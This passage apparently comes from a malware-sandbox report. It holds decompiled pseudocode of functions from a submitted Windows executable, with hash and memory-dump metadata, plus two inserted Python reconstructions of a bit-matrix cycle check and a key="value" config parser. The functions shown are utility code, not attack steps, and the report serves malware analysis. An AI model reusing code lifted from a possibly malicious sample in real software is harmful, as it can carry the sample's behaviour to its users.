                              				if( *((intOrPtr*)(__ecx + 8)) > 0x20 ||  *((intOrPtr*)(__ecx + 0x1c)) > 0x20) {
                              					L31:
                              					_t118 = 0;
                              				} else {
                              					E004032A8(_t203 - 0x28, 1);
                              					 *((intOrPtr*)(_t203 - 0x28)) = 0x41b748;
                              					_t150 = 0;
                              					 *(_t203 - 4) = 0;
                              					E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(__ecx + 0x30)) +  *((intOrPtr*)(__ecx + 0x1c)));
                              					_t190 = 0;
                              					if( *((intOrPtr*)(_t200 + 0x1c)) <= 0) {
                              						L5:
                              						_t191 = 0;
                              						if( *((intOrPtr*)(_t200 + 0x30)) <= _t150) {
                              							L8:
                              							E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(_t200 + 0x44)));
                              							_t192 = 0;
                              							if( *((intOrPtr*)(_t200 + 0x1c)) <= _t150) {
                              								L11:
                              								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
                              								E004042AD(_t203 - 0x28);
                              								_t160 = 0x20;
                              								memset(_t203 - 0xd0, 0, _t160 << 2);
                              								_t162 = 4;
                              								 *(_t203 - 0x38) = _t150;
                              								 *(_t203 - 0x34) = _t150;
                              								 *(_t203 - 0x30) = _t150;
                              								 *((intOrPtr*)(_t203 - 0x2c)) = 0;
                              								 *((intOrPtr*)(_t203 - 0x3c)) = 0x41b378;
                              								 *(_t203 - 4) = 1;
                              								 *(_t203 - 0x4c) = _t150;
                              								 *(_t203 - 0x48) = _t150;
                              								 *(_t203 - 0x44) = _t150;
                              								 *((intOrPtr*)(_t203 - 0x40)) = _t162;
                              								 *((intOrPtr*)(_t203 - 0x50)) = 0x41b378;
                              								 *(_t203 - 4) = 2;
                              								 *(_t203 - 0x10) = _t150;
                              								if( *((intOrPtr*)(_t200 + 8)) > _t150) {
                              									do {
                              										 *(_t203 - 0x14) = _t150;
                              										_t198 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc)) +  *(_t203 - 0x10) * 4));
                              										if( *((intOrPtr*)(_t198 + 0x14)) > _t150) {
                              											do {
                              												E004039DF(_t203 - 0x3c,  *(_t203 - 0x10));
                              												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
                              											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x14)));
                              										}
                              										 *(_t203 - 0x14) = _t150;
                              										if( *((intOrPtr*)(_t198 + 0x18)) > _t150) {
                              											do {
                              												E004039DF(_t203 - 0x50,  *(_t203 - 0x10));
                              												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
                              											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x18)));
                              										}
                              										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
                              									} while ( *(_t203 - 0x10) <  *((intOrPtr*)(_t200 + 8)));
                              								}
                              								_t195 = 0;
                              								if( *((intOrPtr*)(_t200 + 0x1c)) > _t150) {
                              									do {
                              										_t151 = 1;
                              										 *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) =  *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) | _t151 <<  *( *(_t203 - 0x44) + ( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8)[1] * 4);
                              										_t195 = _t195 + 1;
                              									} while (_t195 <  *((intOrPtr*)(_t200 + 0x1c)));
                              									_t150 = 0;
                              								}
                              								 *(_t203 - 4) = 1;
                              								E004042AD(_t203 - 0x50);
                              								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
                              								E004042AD(_t203 - 0x3c);
                              								_t180 = _t203 - 0xd0;
                              								 *(_t203 - 0x14) = 0x20;
                              								do {
                              									 *(_t203 - 0x10) = _t150;
                              									_t202 = _t203 - 0xd0;
                              									do {
                              										_t129 =  *_t180;
                              										_t196 = 1;
                              										if((_t129 & _t196 <<  *(_t203 - 0x10)) != 0) {
                              											 *_t180 = _t129 |  *_t202;
                              										}
                              										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
                              										_t202 =  &(_t202[1]);
                              									} while ( *(_t203 - 0x10) < 0x20);
                              									_t180 =  &(_t180[1]);
                              									_t106 = _t203 - 0x14;
                              									 *_t106 =  *(_t203 - 0x14) - 1;
                              								} while ( *_t106 != 0);
                              								_t130 = _t203 - 0xd0;
                              								while(1) {
                              									_t181 = 1;
                              									if(( *_t130 & _t181 << _t150) != 0) {
                              										goto L31;
                              									}
                              									_t150 = _t150 + 1;
                              									_t130 =  &(_t130[1]);
                              									if(_t150 < 0x20) {
                              										continue;
                              									} else {
                              										_t118 = 1;
                              									}
                              									goto L32;
                              								}
                              								goto L31;
                              							} else {
                              								while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + 4 + _t192 * 8))) == 0) {
                              									_t192 = _t192 + 1;
                              									if(_t192 <  *((intOrPtr*)(_t200 + 0x1c))) {
                              										continue;
                              									} else {
                              										goto L11;
                              									}
                              									goto L32;
                              								}
                              								goto L30;
                              							}
                              						} else {
                              							while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x34)) + _t191 * 4))) == 0) {
                              								_t191 = _t191 + 1;
                              								if(_t191 <  *((intOrPtr*)(_t200 + 0x30))) {
                              									continue;
                              								} else {
                              									goto L8;
                              								}
                              								goto L32;
                              							}
                              							goto L30;
                              						}
                              					} else {
                              						while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + _t190 * 8))) == 0) {
                              							_t190 = _t190 + 1;
                              							if(_t190 <  *((intOrPtr*)(_t200 + 0x1c))) {
                              								continue;
                              							} else {
                              								goto L5;
                              							}
                              							goto L32;
                              						}
                              						L30:
                              						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
                              						E004042AD(_t203 - 0x28);
                              						goto L31;
                              					}
                              				}
                              				L32:
                              				 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
                              				return _t118;
                              			}
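The 32-row bit-matrix pass that closes the listing above (the 0x20 zeroed dwords are one row per node with bit i standing for node i; one forward sweep ORs into each row the rows of the nodes it already marks, after which any row with its own bit set forces the 0 return) is reproduced here in Python as an added example for analysts. It is not code from the sample or from the report: the explicit edge-list input is a simplification (the listing derives its edges from the 8-byte pair array at +0x20 through two index tables built from the +0xc entries), and the function names are assumptions.

```python
"""Analyst reconstruction of the 32x32 bit-matrix pass at the end of the listing above."""
from typing import Iterable, List, Tuple

N = 32  # the listing zeroes 0x20 dwords: row r is a bitmask of the nodes r points to


def build_rows(edges: Iterable[Tuple[int, int]]) -> List[int]:
    """rows[a] |= 1 << b for every edge (a, b); the listing obtains a and b via two index tables."""
    rows = [0] * N
    for a, b in edges:
        if not (0 <= a < N and 0 <= b < N):
            # Stands in for the early 0 return taken when a count at +8 or +0x1c exceeds 0x20.
            raise ValueError(f"node index out of range: ({a}, {b})")
        rows[a] |= 1 << b
    return rows


def propagate(rows: List[int]) -> List[int]:
    """One forward sweep as the listing does it: a row absorbs the row of each node it marks."""
    rows = list(rows)
    for r in range(N):
        for i in range(N):
            if rows[r] & (1 << i):
                rows[r] |= rows[i]
    return rows


def no_self_reach(edges: Iterable[Tuple[int, int]]) -> int:
    """1 when no row has its own bit set after the sweep, 0 otherwise (the listing's two return values)."""
    rows = propagate(build_rows(edges))
    for i in range(N):
        if rows[i] & (1 << i):
            return 0
    return 1


if __name__ == "__main__":
    # Constructed inputs: a chain (no node reaches itself) and a three-node ring.
    print(no_self_reach([(0, 1), (1, 2)]))           # 1
    print(no_self_reach([(2, 1), (1, 0), (0, 2)]))   # 0
```

The sweep is a single pass over the rows in index order, not a full Warshall closure: a row only absorbs the state the lower-indexed rows had when it was visited, which is exactly what the listing computes and what the self-bit test at the end is run against.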

                              Instruction address column: 0x0040d7d1 - 0x0040d9f8

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $
                              • API String ID: 3519838083-227171996
                              • Opcode ID: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                              • Instruction ID: b608afa5533618173c50a936dd0dc92eebd328cd23ff399218f1dfb4b0bc6294
                              • Opcode Fuzzy Hash: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                              • Instruction Fuzzy Hash: 6A713571E0020A9FCB24DF99D481AAEB7B1FF48314F10457ED416B7691D734AA8ACF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E00403D5A(intOrPtr* __ecx, intOrPtr __edx) {
                              				void* __edi;
                              				void* _t69;
                              				signed int _t70;
                              				intOrPtr _t79;
                              				intOrPtr _t90;
                              				signed int _t91;
                              				char _t98;
                              				char _t116;
                              				intOrPtr* _t136;
                              				void* _t138;
                              
                              				E00413954(E004194DC, _t138);
                              				_t136 = __ecx;
                              				 *((intOrPtr*)(_t138 - 0x20)) = __edx;
                              				E004042D6();
                              				 *((intOrPtr*)(_t138 - 0x10)) = 0;
                              				while(1) {
                              					L1:
                              					_t69 = E00403FE2(_t136, _t138 - 0x10);
                              					_t146 = _t69;
                              					if(_t69 == 0) {
                              						break;
                              					}
                              					E00402EE1(_t138 - 0x50);
                              					 *(_t138 - 4) = 0;
                              					E00402EE1(_t138 - 0x44);
                              					_t7 = _t138 - 0x14; // 0x414be4
                              					 *(_t138 - 4) = 1;
                              					E00403F3C(_t138 - 0x38,  *_t136 +  *((intOrPtr*)(_t138 - 0x10)));
                              					 *(_t138 - 4) = 2;
                              					if(E0040411F(_t138 - 0x38, _t138 - 0x50, _t146) == 0) {
                              						L26:
                              						E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
                              						E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
                              						E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
                              						L28:
                              						_t70 = 0;
                              						__eflags = 0;
                              						L29:
                              						 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
                              						return _t70;
                              					}
                              					_t15 = _t138 - 0x14; // 0x414be4
                              					_t79 =  *_t15;
                              					if(_t79 == 0) {
                              						goto L26;
                              					}
                              					 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + _t79;
                              					if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x3d) {
                              						goto L26;
                              					} else {
                              						 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                              						if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x22) {
                              							goto L26;
                              						} else {
                              							 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                              							 *((intOrPtr*)(_t138 - 0x2c)) = 0;
                              							 *((intOrPtr*)(_t138 - 0x28)) = 0;
                              							 *((intOrPtr*)(_t138 - 0x24)) = 0;
                              							E0040243E(_t138 - 0x2c, 3);
                              							 *(_t138 - 4) = 3;
                              							while( *((intOrPtr*)(_t138 - 0x10)) <  *((intOrPtr*)(_t136 + 4))) {
                              								_t90 =  *_t136;
                              								_t116 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
                              								 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                              								 *((char*)(_t138 - 0x1c)) = _t116;
                              								if(_t116 == 0x22) {
                              									_t91 = E0040411F(_t138 - 0x2c, _t138 - 0x44, __eflags);
                              									__eflags = _t91;
                              									if(_t91 == 0) {
                              										break;
                              									}
                              									_push(_t138 - 0x50);
                              									E004040BE( *((intOrPtr*)(_t138 - 0x20)), 0);
                              									E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
                              									E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
                              									 *(_t138 - 4) =  *(_t138 - 4) | 0xffffffff;
                              									E0040213F(_t138 - 0x50);
                              									goto L1;
                              								}
                              								if(_t116 != 0x5c) {
                              									_push( *((intOrPtr*)(_t138 - 0x1c)));
                              								} else {
                              									_t98 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
                              									 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                              									 *((char*)(_t138 - 0x18)) = _t98;
                              									if(_t98 == 0x22) {
                              										_push(0x22);
                              									} else {
                              										if(_t98 == 0x5c) {
                              											_push(0x5c);
                              										} else {
                              											if(_t98 == 0x6e) {
                              												_push(0xa);
                              											} else {
                              												if(_t98 == 0x74) {
                              													_push(9);
                              												} else {
                              													E00401EE5(_t138 - 0x2c, 0x5c);
                              													_push( *((intOrPtr*)(_t138 - 0x18)));
                              												}
                              											}
                              										}
                              									}
                              								}
                              								E00401EE5(_t138 - 0x2c);
                              							}
                              							E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
                              							E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
                              							E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
                              							E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
                              							goto L28;
                              						}
                              					}
                              				}
                              				_t70 = 1;
                              				goto L29;
                              			}
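The scanning logic of E00403D5A above (a key token, whitespace, the 0x3d '=' check, the 0x22 '"' check, then characters up to the closing quote with the four backslash escapes \" \\ \n \t translated and any other backslash pair kept literally; the 1 return when the input is exhausted, 0 on any other exit) is reproduced in Python as an added example for analysts who need to read the sample's configuration text. It is not code from the sample or from the report. The identifier-style token character set, the whitespace skipping attributed to E00403FE2, and the append-to-list stand-in for the store through E004040BE are assumptions; E00403F3C and E0040411F are opaque in the listing.

```python
"""Readable stand-in for the key="value" scanner seen in E00403D5A (analyst reconstruction)."""
import re
from typing import List, Optional, Tuple

# Assumption: keys are identifier-like; the real token scanner (E00403F3C) is opaque in the listing.
_TOKEN = re.compile(r"[A-Za-z0-9_]+")

# The four backslash escapes the listing translates (0x22, 0x5c, 0x6e -> 0x0a, 0x74 -> 0x09).
_ESCAPES = {'"': '"', "\\": "\\", "n": "\n", "t": "\t"}


def _skip_ws(s: str, pos: int) -> int:
    """Assumed behaviour of E00403FE2: step over whitespace and report the new offset."""
    while pos < len(s) and s[pos] in " \t\r\n":
        pos += 1
    return pos


def parse_quoted_pairs(s: str) -> Optional[List[Tuple[str, str]]]:
    """Return the (key, value) pairs in input order, or None wherever the listing returns 0."""
    pairs: List[Tuple[str, str]] = []
    pos = _skip_ws(s, 0)
    while pos < len(s):                      # E00403FE2 == 0 at end of input -> success
        m = _TOKEN.match(s, pos)
        if m is None:                        # zero-length key -> failure
            return None
        key = m.group(0)
        pos = _skip_ws(s, m.end())
        if pos >= len(s) or s[pos] != "=":   # the 0x3d check
            return None
        pos = _skip_ws(s, pos + 1)
        if pos >= len(s) or s[pos] != '"':   # the 0x22 check
            return None
        pos += 1
        value: List[str] = []
        closed = False
        while pos < len(s):
            c = s[pos]
            pos += 1
            if c == '"':                     # closing quote: the pair is complete
                closed = True
                break
            if c == "\\":
                if pos >= len(s):            # the listing reads one byte past the buffer here; fail instead
                    return None
                n = s[pos]
                pos += 1
                value.append(_ESCAPES.get(n, "\\" + n))  # unknown escape kept as backslash + char
                continue
            value.append(c)
        if not closed:                       # ran off the end inside the quotes
            return None
        pairs.append((key, "".join(value)))
        pos = _skip_ws(s, pos)
    return pairs


if __name__ == "__main__":
    # Constructed sample text, not data recovered from the sample.
    print(parse_quoted_pairs('host="a.example" path="C:\\\\x\\"y\\n"'))
```

Unterminated values, a missing '=' or opening quote, and an empty key all map to None, matching the single failure path (L26/L28) that the listing shares between those cases.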


                              Instruction address column: 0x00403d5f - 0x00403f3b

                              APIs
                              • __EH_prolog.LIBCMT ref: 00403D5F
                                • Part of subcall function 00403F3C: __EH_prolog.LIBCMT ref: 00403F41
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: > @$KA
                              • API String ID: 3519838083-301980584
                              • Opcode ID: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                              • Instruction ID: 0797aa4f2666763f951e0621ef07ec53320c6840b80f95fc9e8c0876c74f2843
                              • Opcode Fuzzy Hash: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                              • Instruction Fuzzy Hash: 27517D30D0020A9ACF15EF95C855AEEBF7AAF5430AF10452FE452372D2DB795B06CB89
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E0041808D(void* __ebx, void* __edi) {
                              				char _v17;
                              				signed char _v18;
                              				struct _cpinfo _v24;
                              				char _v280;
                              				char _v536;
                              				char _v792;
                              				char _v1304;
                              				void* _t43;
                              				char _t44;
                              				signed char _t45;
                              				void* _t55;
                              				signed int _t56;
                              				signed char _t64;
                              				intOrPtr* _t66;
                              				signed int _t68;
                              				signed int _t70;
                              				signed int _t71;
                              				signed char _t76;
                              				signed char _t77;
                              				signed char* _t78;
                              				void* _t81;
                              				void* _t87;
                              				void* _t88;
                              
                              				if(GetCPInfo( *0x4256c8,  &_v24) == 1) {
                              					_t44 = 0;
                              					do {
                              						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
                              						_t44 = _t44 + 1;
                              					} while (_t44 < 0x100);
                              					_t45 = _v18;
                              					_v280 = 0x20;
                              					if(_t45 == 0) {
                              						L9:
                              						E00418A6C(1,  &_v280, 0x100,  &_v1304,  *0x4256c8,  *0x4258e4, 0);
                              						E0041881D( *0x4258e4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4256c8, 0);
                              						E0041881D( *0x4258e4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4256c8, 0);
                              						_t55 = 0;
                              						_t66 =  &_v1304;
                              						do {
                              							_t76 =  *_t66;
                              							if((_t76 & 0x00000001) == 0) {
                              								if((_t76 & 0x00000002) == 0) {
                              									 *(_t55 + 0x4256e0) =  *(_t55 + 0x4256e0) & 0x00000000;
                              									goto L16;
                              								}
                              								 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000020;
                              								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
                              								L12:
                              								 *(_t55 + 0x4256e0) = _t77;
                              								goto L16;
                              							}
                              							 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000010;
                              							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
                              							goto L12;
                              							L16:
                              							_t55 = _t55 + 1;
                              							_t66 = _t66 + 2;
                              						} while (_t55 < 0x100);
                              						return _t55;
                              					}
                              					_t78 =  &_v17;
                              					do {
                              						_t68 =  *_t78 & 0x000000ff;
                              						_t56 = _t45 & 0x000000ff;
                              						if(_t56 <= _t68) {
                              							_t81 = _t87 + _t56 - 0x114;
                              							_t70 = _t68 - _t56 + 1;
                              							_t71 = _t70 >> 2;
                              							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
                              							_t88 = _t88 + 0x18;
                              						}
                              						_t78 =  &(_t78[2]);
                              						_t45 =  *((intOrPtr*)(_t78 - 1));
                              					} while (_t45 != 0);
                              					goto L9;
                              				}
                              				_t43 = 0;
                              				do {
                              					if(_t43 < 0x41 || _t43 > 0x5a) {
                              						if(_t43 < 0x61 || _t43 > 0x7a) {
                              							 *(_t43 + 0x4256e0) =  *(_t43 + 0x4256e0) & 0x00000000;
                              						} else {
                              							 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000020;
                              							_t64 = _t43 - 0x20;
                              							goto L22;
                              						}
                              					} else {
                              						 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000010;
                              						_t64 = _t43 + 0x20;
                              						L22:
                              						 *(_t43 + 0x4256e0) = _t64;
                              					}
                              					_t43 = _t43 + 1;
                              				} while (_t43 < 0x100);
                              				return _t43;
                              			}

                              Instruction addresses: 0x004180aa to 0x00418211

                              APIs
                              • GetCPInfo.KERNEL32(?,00000000), ref: 004180A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Info
                              • String ID: $
                              • API String ID: 1807457897-3032137957
                              • Opcode ID: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                              • Instruction ID: d0f9309d8466ab513fef0fe96190925d4c3a9a36aebfd3e00fd14af349a29a6b
                              • Opcode Fuzzy Hash: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                              • Instruction Fuzzy Hash: 18417C322046586EEB22DB14CC4DFFB7FA8DB06700F9400EAD549C7162CA794985CBAA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E00405F5E(intOrPtr __ecx, struct HINSTANCE__* __edx, void* __esi) {
                              				signed int _t38;
                              				WCHAR* _t54;
                              				WCHAR* _t58;
                              				int _t61;
                              				void* _t63;
                              				intOrPtr _t68;
                              
                              				E00413954(E00419764, _t63);
                              				_t68 =  *0x423148; // 0x1
                              				 *(_t63 - 0x14) = __edx;
                              				 *((intOrPtr*)(_t63 - 0x10)) = __ecx;
                              				 *((intOrPtr*)(_t63 - 0x18)) = 0;
                              				if(_t68 == 0) {
                              					_push( *(_t63 + 8));
                              					E00405EBC(_t63 - 0x30, __edx);
                              					 *((intOrPtr*)(_t63 - 4)) = 1;
                              					E00401A03();
                              					_push( *((intOrPtr*)(_t63 - 0x30)));
                              				} else {
                              					 *(_t63 - 0x24) = 0;
                              					 *(_t63 - 0x20) = 0;
                              					 *((intOrPtr*)(_t63 - 0x1c)) = 0;
                              					E00402170(_t63 - 0x24, 3);
                              					 *((intOrPtr*)(_t63 - 4)) = 0;
                              					_t61 = 0x100;
                              					do {
                              						_t61 = _t61 + 0x100;
                              						_t9 = _t61 - 1; // -1
                              						_t36 = _t9;
                              						if(_t9 >=  *((intOrPtr*)(_t63 - 0x1c))) {
                              							E00402170(_t63 - 0x24, _t36);
                              						}
                              						_t14 = _t63 - 0x14; // 0x414be4
                              					} while (_t61 - LoadStringW( *_t14,  *(_t63 + 8),  *(_t63 - 0x24), _t61) <= 1);
                              					_t54 =  *(_t63 - 0x24);
                              					_t38 = 0;
                              					if( *_t54 != 0) {
                              						_t58 = _t54;
                              						do {
                              							_t38 = _t38 + 1;
                              							_t58 =  &(_t58[1]);
                              						} while ( *_t58 != 0);
                              					}
                              					_t54[_t38] = 0;
                              					 *(_t63 - 0x20) = _t38;
                              					E00401CE1( *((intOrPtr*)(_t63 - 0x10)), _t63 - 0x24);
                              					_push( *(_t63 - 0x24));
                              				}
                              				E00403A9C();
                              				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
                              				return  *((intOrPtr*)(_t63 - 0x10));
                              			}

                              Instruction addresses: 0x00405f63 to 0x0040602c

                              APIs
                              • __EH_prolog.LIBCMT ref: 00405F63
                              • LoadStringW.USER32(KA,?,?,00000000), ref: 00405FBC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prologLoadString
                              • String ID: KA
                              • API String ID: 385046869-4133974868
                              • Opcode ID: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                              • Instruction ID: f8b33de4bb70f64bdff40eb498b0250b344fd9cf2a6d880d3b442eae3703c9f6
                              • Opcode Fuzzy Hash: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                              • Instruction Fuzzy Hash: B8212771D0011A9BCB05EFA1C9919EEBBB5FF08308F10407AE106B6291DB794E40CB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405EBC(intOrPtr __ecx, struct HINSTANCE__* __edx) {
                              				intOrPtr _t29;
                              				CHAR* _t43;
                              				int _t49;
                              				void* _t51;
                              
                              				E00413954(E00419748, _t51);
                              				 *((intOrPtr*)(_t51 - 0x10)) = __ecx;
                              				 *(_t51 - 0x14) = __edx;
                              				 *((intOrPtr*)(_t51 - 0x18)) = 0;
                              				 *(_t51 - 0x24) = 0;
                              				 *((intOrPtr*)(_t51 - 0x20)) = 0;
                              				 *((intOrPtr*)(_t51 - 0x1c)) = 0;
                              				E0040243E(_t51 - 0x24, 3);
                              				 *((intOrPtr*)(_t51 - 4)) = 0;
                              				_t49 = 0x100;
                              				do {
                              					_t49 = _t49 + 0x100;
                              					_t9 = _t49 - 1; // -1
                              					_t27 = _t9;
                              					if(_t9 >=  *((intOrPtr*)(_t51 - 0x1c))) {
                              						E0040243E(_t51 - 0x24, _t27);
                              					}
                              					_t14 = _t51 - 0x14; // 0x414be4
                              				} while (_t49 - LoadStringA( *_t14,  *(_t51 + 8),  *(_t51 - 0x24), _t49) <= 1);
                              				_t43 =  *(_t51 - 0x24);
                              				_t29 = 0;
                              				if( *_t43 != 0) {
                              					do {
                              						_t29 = _t29 + 1;
                              					} while ( *((intOrPtr*)(_t29 + _t43)) != 0);
                              				}
                              				 *((char*)(_t29 + _t43)) = 0;
                              				 *((intOrPtr*)(_t51 - 0x20)) = _t29;
                              				E00403D24( *((intOrPtr*)(_t51 - 0x10)), _t51 - 0x24);
                              				E00403A9C( *(_t51 - 0x24));
                              				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
                              				return  *((intOrPtr*)(_t51 - 0x10));
                              			}

                              Instruction addresses: 0x00405ec1 to 0x00405f5b

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prologLoadString
                              • String ID: KA
                              • API String ID: 385046869-4133974868
